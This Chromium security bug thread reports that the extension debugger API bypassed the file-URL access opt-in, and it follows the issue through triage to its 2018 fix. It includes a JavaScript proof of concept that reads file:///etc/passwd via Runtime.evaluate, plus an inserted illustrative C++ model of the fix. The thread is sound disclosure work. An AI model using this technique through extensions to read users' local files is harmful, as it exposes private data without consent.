Issue metadata

Status: Fixed
Closed: Jun 2018
OS: Linux , Windows , Chrome , Mac
Pri: 1
Type: Bug-Security
Issue 666299: Security: debugger extension API bypasses normal opt-in for file:// access

Reported by jannh@google.com, Nov 17 2016 Project Member

Issue description

VULNERABILITY DETAILS
An extension with "debugger" permission can inject code into file:// origins without explicit file URI access permission (the "Allow access to file URLs" checkbox) using the debugger API. Since it seems like the intent of that checkbox is to require more explicit opt-in from the user, I believe that this is a security bug.

Since this only goes from extension context with pretty high privileges to file:// context, I think this is probably low severity?

VERSION
Chrome Version: 54.0.2840.100 stable
Operating System: Linux

REPRODUCTION CASE
To reproduce, in an extension with "debugger" permission but without explicit file:// access opt-in, run this:

chrome.tabs.create({url:'file:///etc/passwd'}, function(res){
  var tabId = res.id;
  chrome.debugger.attach({tabId:tabId}, '1.1', function(){
    var itv = setInterval(function(){
      chrome.debugger.sendCommand({tabId:tabId}, 'Runtime.evaluate', {expression:'document.body.innerText'}, function(res){
        if (res.result.type === 'string' && res.result.value != '') {
          clearInterval(itv);
          chrome.tabs.remove(tabId);
          alert(res.result.value);
        }
      })
    }, 50);
  })
})

Comment 1 by mea...@chromium.org, Nov 18 2016

Components: Platform>Extensions
Labels: Security_Severity-Low Security_Impact-Stable OS-Chrome OS-Linux OS-Mac OS-Windows
Owner: rdevlin....@chromium.org
Status: Assigned (was: Unconfirmed)
Assigning low severity, as the debugger permission is quite powerful already. Devlin, can you please take a look?

Comment 2 by sheriffbot@chromium.org, Nov 19 2016

Project Member
Labels: Pri-2

Comment 3 by mea...@chromium.org, Jan 26 2018

Components: Platform>Apps>DevTools
Labels: -Security_Severity-Low Security_Severity-Medium
Looks like this slipped through the cracks because of my low-severity rating, upgrading to medium severity. This bug predates most of the bugs reported about devtools + extensions.

Comment 4 by sheriffbot@chromium.org, Jan 26 2018

Project Member
rdevlin.cronin: Uh oh! This issue is still open and hasn't been updated in the last 434 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers?

If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one?

If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 5 by sheriffbot@chromium.org, Jan 26 2018

Project Member
Labels: M-64

Comment 6 by sheriffbot@chromium.org, Jan 26 2018

Project Member
Labels: -Pri-2 Pri-1

Comment 7 by sheriffbot@chromium.org, Feb 9 2018

Project Member
rdevlin.cronin: Uh oh! This issue is still open and hasn't been updated in the last 448 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers?

If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one?

If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 8 by sheriffbot@chromium.org, Mar 7 2018

Project Member
Labels: -M-64 M-65

Comment 9 by sheriffbot@chromium.org, Apr 19 2018

Project Member
Labels: -M-65 M-66

Comment 10 by sheriffbot@chromium.org, May 30 2018

Project Member
Labels: -M-66 M-67

Comment 11 by carlosil@chromium.org, Jun 7 2018

Friendly security sheriff ping, this has been open for a while, any progress on it?

Comment 12 by rdevlin....@chromium.org, Jun 7 2018

Labels: -M-67 M-68
On it.

Comment 13 by rdevlin....@chromium.org, Jun 7 2018

Cc: dgozman@chromium.org
dgozman@, hoping you can guide me a bit for part of this.  It's easy enough to prevent the debugging host from attaching initially (I have a CL and test for this ready), but there's a tricky bit where we need to detach the debugger if the tab navigates to a file:// URL the extension doesn't have access to.  I think you recently handled something similar with webui pages; do you have some advice on how to handle this?

Comment 14 by dgozman@chromium.org, Jun 7 2018

This function [1] is called for debugging sessions from extensions when trying to attach or when the page navigates somewhere. Returning false disconnects the debugging session.

[1] https://cs.chromium.org/chromium/src/content/browser/devtools/render_frame_devtools_agent_host.cc?rcl=6f29d60a5f3c8d095274b9a92c45e45b9cdf839b&l=966
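
As an added illustration (not Chromium's code and not from this thread), the C++ model below shows the shape of the check described in comments 13 and 14 and in the commit message: the agent host consults its client both at attach time and on every navigation, and a false answer refuses the attach or detaches the running session. MayInspectUrl, AgentHost and ExtensionDebuggerClient are hypothetical names.

```cpp
#include <string>
#include <utility>
// Illustrative model of the mechanism from comments 13/14 and the commit
// message; not Chromium's code. MayInspectUrl, AgentHost and
// ExtensionDebuggerClient are hypothetical names.
struct DevToolsClient {
  virtual ~DevToolsClient() = default;
  // Consulted by the host before attaching and again on every navigation.
  virtual bool MayInspectUrl(const std::string& url) const = 0;
};

// A session opened through the extension debugger API.
struct ExtensionDebuggerClient : DevToolsClient {
  bool has_file_access;  // the "Allow access to file URLs" opt-in
  explicit ExtensionDebuggerClient(bool f) : has_file_access(f) {}
  bool MayInspectUrl(const std::string& url) const override {
    const bool is_file = url.rfind("file:", 0) == 0;  // scheme check only
    return !is_file || has_file_access;
  }
};

// Minimal agent host: one attached client, re-checked whenever the page moves.
struct AgentHost {
  std::string url;
  const DevToolsClient* client = nullptr;
  explicit AgentHost(std::string u) : url(std::move(u)) {}
  // Attaching is refused up front if the current URL may not be inspected.
  bool Attach(const DevToolsClient* c) {
    if (!c->MayInspectUrl(url)) return false;
    client = c;
    return true;
  }
  // Navigation re-runs the check; a false answer detaches the session, which
  // closes the gap where a tab attached on http:// later lands on file://.
  void Navigate(const std::string& next) {
    url = next;
    if (client && !client->MayInspectUrl(url)) client = nullptr;
  }
  bool IsAttached() const { return client != nullptr; }
};
// Attach at start_url, then navigate to next_url. Returns
// {attached initially, still attached after the navigation}.
std::pair<bool, bool> Scenario(bool file_access, const std::string& start_url,
                               const std::string& next_url) {
  ExtensionDebuggerClient client(file_access);
  AgentHost host(start_url);
  const bool attached = host.Attach(&client);
  host.Navigate(next_url);
  return {attached, host.IsAttached()};
}
```

The fourth scenario in the test (opt-in granted, navigation from http:// to file://) is the one a regression test should keep passing, since the check must not break extensions that were legitimately granted file access.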

Comment 15 by bugdroid1@chromium.org, Jun 22 2018

Project Member
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877

commit 4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877
Author: Devlin Cronin <rdevlin.cronin@chromium.org>
Date: Fri Jun 22 23:16:31 2018

[Extensions] Restrict debugging file:-scheme URLs

Don't allow extensions to debug file:-scheme URLs if the extension does
not have explicit file access (as set in chrome://extensions). Achieve
this by introducing a new virtual method on DevToolsAgentHostClient to
allow the implementor to check if a given host is allowed to be
inspected.

Add regression tests for the same.

Bug: 666299

Change-Id: Icb5ee89bf788643eee166eef83802d10ab825a6c
Reviewed-on: https://chromium-review.googlesource.com/1104954
Commit-Queue: Devlin <rdevlin.cronin@chromium.org>
Reviewed-by: Dmitry Gozman <dgozman@chromium.org>
Cr-Commit-Position: refs/heads/master@{#569828}
[modify] https://crrev.com/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877/chrome/browser/extensions/api/debugger/debugger_api.cc
[modify] https://crrev.com/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877/chrome/browser/extensions/api/debugger/debugger_apitest.cc
[add] https://crrev.com/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877/chrome/test/data/extensions/api_test/debugger_file_access/background.js
[add] https://crrev.com/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877/chrome/test/data/extensions/api_test/debugger_file_access/dummy.html
[add] https://crrev.com/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877/chrome/test/data/extensions/api_test/debugger_file_access/manifest.json
[modify] https://crrev.com/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877/content/browser/devtools/devtools_agent_host_impl.cc
[modify] https://crrev.com/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877/content/browser/devtools/devtools_agent_host_impl.h
[modify] https://crrev.com/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877/content/browser/devtools/render_frame_devtools_agent_host.cc
[modify] https://crrev.com/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877/content/browser/devtools/render_frame_devtools_agent_host.h
[modify] https://crrev.com/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877/content/public/browser/BUILD.gn
[add] https://crrev.com/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877/content/public/browser/devtools_agent_host_client.cc
[modify] https://crrev.com/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877/content/public/browser/devtools_agent_host_client.h

Comment 16 by tsepez@chromium.org, Jun 27 2018

So, did the CL in c#15 fix the issue?  Can we close this one out?  Thanks heaps!

Comment 17 by rdevlin....@chromium.org, Jun 27 2018

Status: Fixed (was: Assigned)
I believe this should be fixed, yes.

Closing it out.

Anyone have opinions on if this should be merged to M68?

Comment 18 by dgozman@chromium.org, Jun 27 2018

This bug was filed in 2016, so I'd say no merge.

Comment 19 by sheriffbot@chromium.org, Jun 28 2018

Project Member
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify

Comment 20 by awhalley@google.com, Jul 23 2018

Labels: -M-68 M-69

Comment 21 by awhalley@google.com, Aug 16

Labels: Release-0-M69

Comment 22 by awhalley@chromium.org, Sep 4

Labels: CVE-2018-16081 CVE_description-missing

Comment 23 by sheriffbot@chromium.org, Oct 4

Project Member
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 24 by awhalley@chromium.org, Jan 4

Labels: -CVE_description-missing CVE_description-submitted
